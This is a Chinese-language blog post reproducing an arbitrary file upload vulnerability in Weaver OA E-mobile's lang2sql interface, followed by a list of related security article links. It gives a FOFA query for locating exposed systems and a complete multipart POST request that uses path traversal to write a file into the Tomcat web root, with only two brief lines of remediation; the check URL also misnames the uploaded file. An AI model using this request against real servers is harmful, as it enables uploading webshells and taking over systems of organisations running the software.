泛微OA_lang2sql 任意文件上传漏洞复现

简介

泛微OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。

漏洞复现

FOFA语法:

title="移动管理平台-企业管理"

页面访问如下:

影响的版本偏系统版本比较老一点的系统

POC:

/emp/lang2sql?client_type=1&lang_tag=1

拼接URL进行访问,不存在该文件可能返回404页面

该文件若存在可尝试进行利用验证

访问该文件存在页面如上

漏洞验证:

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1

Host: IP

User-Agent: Mozilla

Accept: text/html

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 205

Content-Type: multipart/form-data;boundary=----test

------test

Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/test.txt"

1234

------test--

尝试访问:

http://ip:port/text.txt

文件上传成功

修复建议

  • 厂商已提供漏洞修补方案

  • 升级至新版本

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
HackTwoHub10 小时前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构
山东穆柯传感器11 小时前
车间安监验收不通过?安全地毯选对厂家一次达标
安全
Kyrie67811 小时前
OpenSSH 10.4 发布:后量子签名时代来临
安全
IVVi0jToe11 小时前
高效C++线程池设计与实现
java·c++·安全
MartinYeung512 小时前
实战测试 LLM 安全护栏:@martin_yeung/llm-up-guardrail 全面评测与避坑指南
安全
DS小龙哥12 小时前
基于树莓派PICO2设计的汽车少儿安全预警系统
网络·安全·汽车
solar应急响应12 小时前
【银狐应急复盘】伪装 Telegram 的“白加黑”银狐木马,从深度溯源到彻底清除的闭环响应实录(附自查 IOC)
网络·安全
Lottie202612 小时前
京东电商进阶运营:精准定价+安全铺货+竞品监控+利润管控全自动化方案
运维·安全·自动化
运维大师12 小时前
【安全与故障排查】03-【复盘】数据库被入侵:从发现到溯源全过程
数据库·安全·adb
深盾科技_Virbox13 小时前
软件交付保护如何从加壳走向代码虚拟化
java·python·安全